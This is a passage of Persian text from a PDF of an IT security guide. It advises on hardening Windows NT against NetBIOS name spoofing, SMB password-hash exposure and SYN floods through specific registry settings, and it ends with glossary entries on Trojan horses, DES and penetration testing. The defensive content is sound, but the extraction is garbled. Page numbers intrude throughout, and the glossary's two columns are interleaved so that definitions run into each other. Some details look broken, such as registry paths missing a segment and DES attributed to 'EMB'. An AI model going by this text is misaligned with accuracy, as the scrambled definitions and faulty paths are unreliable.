ﻋﻼﻭﻩ ﺑﺮ ﻣﺸﻜﻞ ﻣﻘﻴﺎﺱﭘﺬﻳﺮﻱ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺑﺰﺭﮒ ،ﻳﻚ ﻣﺸﻜﻞ ﻋﻤﺪﺓ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺩﺍﺭﺩ ﻭ ﺁﻥ ﺍﻳﻨﻜـﻪ ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﻫـﺮ ﮔـﺮﻩ ﺑﺮﺍﺣﺘـﻲ
ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻧﺎﻡ ﺛﺒﺖﺷﺪﻩ ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﺧﻮﺩ ﺭﺍ ﺑﺠﺎﻱ ﺁﻥ ﺟﺎ ﺑﺰﻧﺪ.
٣٥٩
ﻳﻚ ﺣﺎﻟﺖ ﺍﻳﻤﻦﺗﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﮔﺮﻩﻫﺎﻱ NetBIOSﺑﻪ ﺻﻮﺭﺕ ﻧﻈﻴﺮ ﺑﻪ ﻧﻈﻴﺮ ﺑﺎ ﻣﻴﺰﺑﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻌﻨـﻮﺍﻥ ﮔـﺮﻩﻫـﺎﻱ ﺳـﺮﻭﻳﺲ ﻧـﺎﻡ
) NetBIOSﮔﺎﻩ ﻣﻌﺮﻭﻑ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ (WINSﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﺪﻩﺍﻧﺪ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪ ﻭ ﺟﻬﺖ ﺛﺒﺖ ﻧﺎﻡ ﻭ ﺟـﺴﺘﺠﻮ ﺑـﺮﺍﻱ ﻧﺎﻣﻬـﺎ
ﺁﻧﺎﻥ ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ ،ﻭ ﺑﺮﺍﻱ ﭘﺨﺶ ﺑﺴﺘﻪﻫﺎ ﺩﺭ ﺳﻄﺢ NetBIOSﺑﺎ ﮔﺮﻩﻫـﺎﻱ ﺗﻮﺯﻳـﻊ datagramﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻛﻨﻨـﺪ.
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ NetBIOSﺩﺭ ﺑﺮﺍﺑﺮ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﻧﺎﻣﻬﺎ ﺗﻮﺳﻂ ﻣﺎﺷﻴﻨﻬﺎ ﻣﺤﺎﻓﻈﺖ ﺑﻌﻤﻞ ﻣﻲﺁﻭﺭﺩ .ﺑﻌﻼﻭﻩ ﻣﻘﺪﺍﺭ ﻛﻠﻴﺪ
\HKEY_LOCAL_MACHINE\CurrentControlSet\Services\Netbt\Parameters\NoNameReleaseOnD
emand
ﺩﺭ registryﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﺑﺮ ١ﮔﺬﺍﺷﺖ ﺗﺎ ﺍﺯ ﭘﺎﺳﺦ ﺩﺍﺩﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺍﻋﻼﻡ ﻧﺎﻡ )ﻛﻪ ﺍﺣﺘﻤـﺎ ﹰ
ﻻ ﺍﺯ ﻃـﺮﻑ ﻳـﻚ ﻣﻬـﺎﺟﻢ
ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﻧﺎﻡ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭ ﺟﺎ ﺯﺩﻥ ﺧﻮﺩﺵ ﺑﻪ ﺟﺎﻱ ﻭﻱ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ( ﺟﻠﻮﮔﻴﺮﻱ ﺷﻮﺩ.
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ،ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻘﺎﺿﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻣﻨﺒﻊ ﺑﺎﻳﺪ ﺍﺑﺘﺪﺍ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SMBﻛﻪ ﺁﻥ ﻣﻨﺒﻊ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ ﻭﺍﺭﺩ ﺷـﻮﻧﺪ.
ﺭﻭﻧﺪ ﻭﺭﻭﺩ ﺩﺭ ﻧﮕﺎﺭﺷﻬﺎﻱ ﺟﺪﻳﺪ SMBﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻪ ﺭﻭﺵ ﭘﺮﺳـﺶ ﻭ ﭘﺎﺳـﺦ ﺻـﻮﺭﺕ ﻣـﻲﮔﻴـﺮﺩ ٣٦٠.ﻭﻗﺘـﻲ ﻛـﺎﺭﺑﺮﻱ
ﺩﺭﺧﻮﺍﺳﺖ ﻭﺭﻭﺩ ﻣﻲﺩﻫﺪ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SMBﻳﻚ ﺭﺷﺘﺔ ﻣﺘﻨﻲ ﻳﻜﺘﺎ ﺑﻌﻨﻮﺍﻥ ﭘﺮﺳﺶ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻲﻓﺮﺳﺘﺪ .ﺳﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩ
ﺍﻳﻦ ﺭﺷﺘﻪ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﻧﺸﺴﺘﻲ ﻛﻪ ﺍﺯ ﺭﻭﻱ ﺩﺭﻫﻤﺮﻳﺨﺘﺔ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﻣﺤﺎﺳﺒﻪ ﻣﻲﺷﻮﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣـﻲﻛﻨـﺪ ﻭ ﺁﻧـﺮﺍ
ﺑﻌﻨﻮﺍﻥ ﭘﺎﺳﺦ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SMBﺑﺎﺯ ﻣﻲﮔﺮﺩﺍﻧﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SMBﻧﻴﺰ ﻫﻤﺎﻥ ﻋﻤﻠﻴﺎﺕ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ﻭ ﻧﺘﻴﺠﻪ ﺭﺍ ﺑـﺎ ﺟـﻮﺍﺏ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﻛﻨﺪ .ﺍﮔﺮ ﺍﻳﻨﺪﻭ ﻳﻜﺴﺎﻥ ﺑﺎﺷﻨﺪ ،ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﺗﺼﺪﻳﻖ ﻣﻲﺷﻮﺩ .ﺷﻜﻞ ﺩﻗﻴﻖ ﻣﺤﺎﺳﺒﺎﺕ ﺑﺴﺘﮕﻲ ﺑﻪ ﮔﻮﻳﺶ ﻣﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ SMBﺩﺍﺭﺩ؛ ﻭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﻭ ﮔﻮﻳﺶ ﺍﺻﻠﻲ ) LMﻭ (NTﺗﻌﺮﻳﻒ ﺷﺪﻩﺍﻧﺪ.
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻳﻦ ﺑﻪ ﻣﻌﻨﺎﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ) SMBﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻳﮕﺮﻱ ﻛـﻪ ﺑـﺎ ﺁﻥ ﺩﺭ ﺍﺭﺗﺒـﺎﻁ ﺍﺳـﺖ(
ﺩﺭﻫﻤﺮﻳﺨﺘﺔ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ )ﻭﻟﻲ ﻧﻪ ﻣﺘﻦﺳﺎﺩﺓ ﺭﻣـﺰ ﻋﺒـﻮﺭ( ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ .ﺍﮔـﺮ ﺍﻳـﻦ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﻪ ﺩﺳـﺖ ﻣﻬﺎﺟﻤـﺎﻥ ﺑﻴﺎﻓﺘـﺪ،
ﺩﺭﻫﻤﺮﻳﺨﺘﺔ ﺗﻤﺎﻡ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻓﺸﺎ ﻣﻲﺷﻮﺩ )ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺟﺎ ﺑﺰﻧﺪ ﻭ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SMB
ﻣﺘﺼﻞ ﮔﺮﺩﺩ( .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩ ﺩﺍﺭﺍﻱ ﺍﻳﻦ ﻣﺰﻳﺖ ﺍﺳﺖ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ،ﭼﻪ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﻭ ﭼﻪ ﺑﺼﻮﺭﺕ ﺩﺭﻫﻤﺮﻳﺨﺘﻪ ﺍﺯ ﻫـﻴﭻ
ﻛﺠﺎﻱ ﺷﺒﻜﻪ ﻋﺒﻮﺭ ﻧﻤﻲﻛﻨﺪ .ﺩﺭﻧﺘﻴﺠﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ SMBﺑﺎﻳﺪ ﻣﺜﻞ ﻛﻨﺘﺮﻟﮕﺮﻫﺎﻱ ﺩﺍﻣﻨﺔ Kerberosﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ
ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﺍﮔﺮ ﺍﺯ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬﺎﻱ Windowsﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ NetBIOS" ،ﺍﺯ ﻃﺮﻳﻖ "TCP/IPﺭﺍ ﺩﺭ ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴـﺸﺮﻓﺘﺔ TCP/IPﻛـﺎﻣ ﹰ
ﻼ
ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ .ﺍﮔﺮ ﺗﻤﺎﻡ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺷﺒﻜﻪ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ NetBIOS/SMBﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ ،ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻃﻮﺭﻱ
ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﺗﻨﻬﺎ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻳﻲ ﭘﺎﺳﺦ ﺩﻫﻨﺪ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﺁﺧﺮﻳﻦ ﻭﻳﺮﺍﻳﺶ ﭘﺮﻭﺗﻜﻞ )ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ (NTLMv2ﺁﻣﺪﻩﺍﻧﺪ ﺗﺎ ﺑﺪﻳﻨﺼﻮﺭﺕ
ﺟﻠﻮﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣﻬﺎﺟﻤﺎﻥ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻗﺪﻳﻤﻲﺗﺮ ﮔﺮﻓﺘﻪ ﺷﻮﺩ .ﺍﮔﺮ ﺑﺮﺍﻱ ﺍﺩﺍﺭﺓ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺭﺍﻫﺒﺮﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻮﺭﺩ ﻧﻴـﺎﺯ
ﻧﻴﺴﺖ ،ﺑﻪ ﻛﻠﻴﺪ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\Auto
ShareWKS
ﺩﺭ registryﻣﻘﺪﺍﺭ ٠ﺑﺪﻫﻴﺪ ﺗﺎ ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ.
Windowsﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ ﺩﻭﺭ ﻧﻪﺗﻨﻬﺎ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺑﻠﻜﻪ ﺑﻪ ﻛﻠﻴﺪﻫﺎﻱ registryﻧﻴﺰ ﺩﺳﺘﺮﺳـﻲ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﻣﺠﻮﺯ ﺍﻣﻨﻴﺘﻲ ﺭﻭﻱ ﻛﻠﻴﺪ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurePipeServers\winreg
ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﺗﻌﻴﻴﻦ ﻣﻲﻛﻨﺪ ﻛﻪ ﻛﺪﺍﻡ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ registryﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ .ﺍﮔﺮ ﻧﻴﺎﺯ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ registry
ﺩﺍﺭﻳﺪ ،ﺍﻳﻦ ﮔﺮﻭﻩ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﺷﺎﻣﻞ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﺑﺎﺷﺪ ،ﻭ ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻫﻴﭽﻜﺲ ﻧﺒﺎﺷﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗـﻮﺍﻥ ﺳـﺮﻭﻳﺲ
ﺩﺳﺘﺮﺳﻲ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ registryﺭﺍ ﺑﺎﻟﻜﻞ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩ.
ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴﺸﺮﻓﺘﺔ TCP/IPﺑﺮﺍﻱ ﻛﺎﺭﺗﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Windows NTﺩﺍﺭﺍﻱ ﻳﻚ ﺻﺎﻓﻲ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺑـﺴﺘﻪﻫـﺎ
ﺍﺳﺖ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﭘﻮﺭﺕ ﻣﻘﺼﺪ ﺑﺴﺘﻪﻫﺎﻱ UDPﻳﺎ TCPﺑﻪ ﺁﻧﻬﺎ ﺍﺟﺎﺯﺓ ﻋﺒﻮﺭ ﻣﻲﺩﻫﺪ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﺘﻪﻫﺎﻱ ﻏﻴـﺮ IPﺭﺍ ﻧﻴـﺰ
ﻏﺮﺑﺎﻝ ﻛﻨﺪ.
ﭘﺮﺩﺍﺯﻩﻫﺎ ﻭ ﺣﺎﻓﻈﻪ
ﺍﺯ ﻃﺮﻳﻖ Task Managerﻣﻲﺗﻮﺍﻥ ﺑﻪ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ Windowsﻧﻈﺎﺭﺕ ﻛﺮﺩ ،ﺑﻪ ﺁﻧﻬﺎ ﭘﺎﻳﺎﻥ ﺑﺨﺸﻴﺪ ،ﻭ ﻳﺎ ﺍﻭﻟﻮﻳﺖ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺭﺍ ﺑﻪ ﻳﻜـﻲ
ﺍﺯ ﺷﺶ ﺳﻄﺢ ،ﺍﺯ "ﭘﺎﻳﻴﻦ" ﺗﺎ "ﺑﻼﺩﺭﻧﮓ" ﺗﻐﻴﻴﺮ ﺩﺍﺩ Task Manager .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺣﺎﻓﻈﺔ ﻣﺼﺮﻓﻲ ﻫﺮ ﭘﺮﺩﺍﺯﻩ ﺭﺍ ﻧﻤﺎﻳﺶ ﺩﻫـﺪ .ﺍﺯ
ﺁﻧﺠﺎ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ Windowsﺑﻪ ﻧﺪﺭﺕ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ﻭ ﺍﺷﺘﺮﺍﻙ ﺯﻣﺎﻧﻲ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ،ﺣﻤﻼﺕ ﺳﺮﺭﻳﺰ ﺣﺎﻓﻈـﻪ ﻭ ﭘـﺮﺩﺍﺯﻩ
ﻻ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺁﺷﻜﺎﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳﻖ Task Managerﻛﺸﻒ ﻭ ﺍﺯ ﺣﺎﻓﻈﻪ ﺑﻴﺮﻭﻥ ﺍﻧﺪﺍﺧﺘﻪ ﺷﻮﺩ.
ﻣﻌﻤﻮ ﹰ
ﺩﻳﺴﻜﻬﺎ
NTFSﺩﺍﺭﺍﻱ ﻳﻚ ﺳﻴﺴﺘﻢ quotaﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﺭﻳﺰ ﺷﺪﻥ ﺩﻳﺴﻜﻬﺎ ﻭ partitionﻫﺎ ﺑﻜﺎﺭ ﺭﻭﺩ .ﺍﻳﻦ ﻭﻳﮋﮔـﻲ
ﻻ ﻛﺎﺭﺑﺮﻱ ﻏﻴﺮ ﺍﺯ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻧﺪﺍﺭﻧـﺪ
ﻧﻴﺰ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻔﻴﺪ ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻣﻌﻤﻮ ﹰ
ﻻ ﺑﺮﺍﻱ ﺍﺟﺮﺍﺷﺪﻥ ﺑﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ.
ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٥٢
ﺷﺒﻜﻪ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Windows NTﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﺮﺧﻲ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺷـﺒﻜﻪﺍﻱ ﻣﺎﻧﻨـﺪ ﺳـﻴﻞ SYNﺩﺍﺭﺍﻱ
ﺗﻨﻈﻴﻤﺎﺕ ﺯﻳﺎﺩﻱ ﺩﺭ registryﻫﺴﺘﻨﺪ؛ ﺍﻣﺎ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ﺍﻳﻦ ﺗﻨﻈﻴﻤﺎﺕ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﻓﻌﺎﻝ ﻧﻤﻲﺑﺎﺷﻨﺪ .ﺗﻨﻈﻴﻤﺎﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﺮﺭﺳﻲ
ﻛﻨﻴﺪ ﺩﺭ ﻣـﺴﻴﺮ \HKEY_LOCAL_MACHINE\CurrentControlSet\Services\Tcpip\Parametersﻗـﺮﺍﺭ ﺩﺍﺭﻧـﺪ ﻭ
ﻛﻠﻴﺪﻫﺎﻱ ﺁﻧﻬﺎ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ،TcpMaxHalfOpen ،SynAttackProtectﻭ .TcpMaxHalfOpenRetried
ﻭﻗﻮﻉ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮﻱ ﺍﺯ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﻗﺎﺑﻠﻴﺖ ""automatic detection and discovery
ﺑــﺴﻴﺎﺭ ﺩﺷــﻮﺍﺭ ﻛــﺮﺩ .ﺑــﺮﺍﻱ ﺟﻠــﻮﮔﻴﺮﻱ ﺍﺯ ﻭﺍﻛــﻨﺶ ﻋﺠﻴــﺐ ﺳﻴــﺴﺘﻢ ﺑــﻪ ﺷــﺮﺍﻳﻂ ﻏﻴﺮﻋــﺎﺩﻱ ﺷــﺒﻜﻪ ﺑﺎﻳــﺪ ﺑــﻪ ﻛﻠﻴــﺪﻫﺎﻱ
EnableDeadGWDetect ،EnablePMTUDiscoveryﻭ EnableICMPRedirectsﻣﻘﺪﺍﺭ ٠ﺩﺍﺩ .ﻫﻤﭽﻨﻴﻦ ﻭﺍﺳﻄﻬﺎ ﺭﺍ
ﺑﺎﻳﺪ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﺮﺩ ﻛﻪ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺑﻪ ﺟﺴﺘﺠﻮﻱ ﻣﺴﻴﺮﻳﺎﺏ ﻧﭙﺮﺩﺍﺯﻧﺪ ﻭ ﻫﻤﻮﺍﺭﻩ ﻣﺴﻴﺮﻫﺎﻱ ﺍﻳـﺴﺘﺎ ﻭ ﺍﺯ ﭘـﻴﺶ ﺗﻌﺮﻳـﻒﺷـﺪﻩ ﺭﺍ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
ﭘﻴﻮﺳﺘﻬﺎ
٣٦٧
ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ
ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺑﻨﻈﺮ ﻋﻤﻠﻜﺮﺩ ﻣﻔﻴـﺪ ﻭ ﻣـﺸﺮﻭﻋﻲ ﺩﺍﺭﺩ،
ﻻ ﺑﺪﺧﻮﺍﻫﺎﻧـﻪ ﻧﻴـﺰ
ﺍﻣﺎ ﺣـﺎﻭﻱ ﻳـﻚ ﻋﻤﻠﻜـﺮﺩ ﻣﺨﻔـﻲ ﻭ ﺍﺣﺘﻤـﺎ ﹰ
ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﮔﺎﻫﻲ ﺑﺎ ﺑﻬـﺮﻩﺑـﺮﺩﺍﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻲ ﻛـﻪ ﺭﻭﻱ ﺁﻥ
ﻧﺼﺐ ﺍﺳﺖ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﭘـﺸﺖ ﭘﻴﻮﺳﺖ ۱
ﺳﺮ ﺑﮕﺬﺍﺭﺩ.
ﻭﺍﮊﻩﻧﺎﻣﺔ ﺍﺻﻄﻼﺣﺎﺕ
٣٦٨
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺩﻩﻫﺎ )(DES
٣٦٢
ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻛـﻪ ﺗﻮﺳـﻂ EMBﺳـﺎﺧﺘﻪ ﺷـﺪﻩ ﻭ ﺁﺯﻣﻮﻥ ﻧﻔﻮﺫﭘﺬﻳﺮﻱ
ﺳﭙﺲ ﺑﻮﺳﻴﻠﺔ ﻣﺆﺳـﺴﺔ ﻣﻠـﻲ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺭﺳـﻲ ﻭ ﺩﺭ ﺳـﺎﻝ ﻻ ﻗﺴﻤﺘﻲ ﺍﺯ ﺍﻋﻄـﺎﻱ ﮔـﻮﺍﻫﻲ ﺑـﻪ ﻳﻜﻲ ﺍﺯ ﺑﺮﺭﺳﻴﻬﺎﻳﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ
۱۹۷۷ﺍﻧﺘﺨﺎﺏ ﺷﺪ .ﺍﺳﺘﺎﻧﺪﺍﺭﺩ DESﻛﻪ ﺩﺭ ۲۰ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﻧﺠﺎﻡ ﻣﻲﭘﺬﻳﺮﺩ ﻭ ﻃﻲ ﺁﻥ ﺍﺭﺯﻳﺎﺑﻬﺎ ﺗﻼﺵ ﻣـﻲﻛﻨﻨـﺪ ﺑـﺎ
ﻫﺮ ﺩﻭ ﺑﺨﺶ ﺩﻭﻟﺘﻲ ﻭ ﺧﺼﻮﺻﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑـﻮﺩﻩ ،ﺍﻣﺘﺤـﺎﻥ ﻓﺮﻳﺐ ﺩﺍﺩﻥ ﺳﻴﺴﺘﻢ ﺍﻣﻨﻴﺘﻲ ،ﺭﺍﻫﻬﺎﻱ ﻧﻔﻮﺫ ﺑﻪ ﻻﻳﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ
ﺧﻮﺩ ﺭﺍ ﺑﺨﻮﺑﻲ ﭘﺲ ﺩﺍﺩﻩ ﺍﺳﺖ. ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﺭﺍ ﻛﺸﻒ ﻛﻨﻨﺪ.
٣٦٣
٣٦٩
ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺗﻠﻔﻨﻲ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ
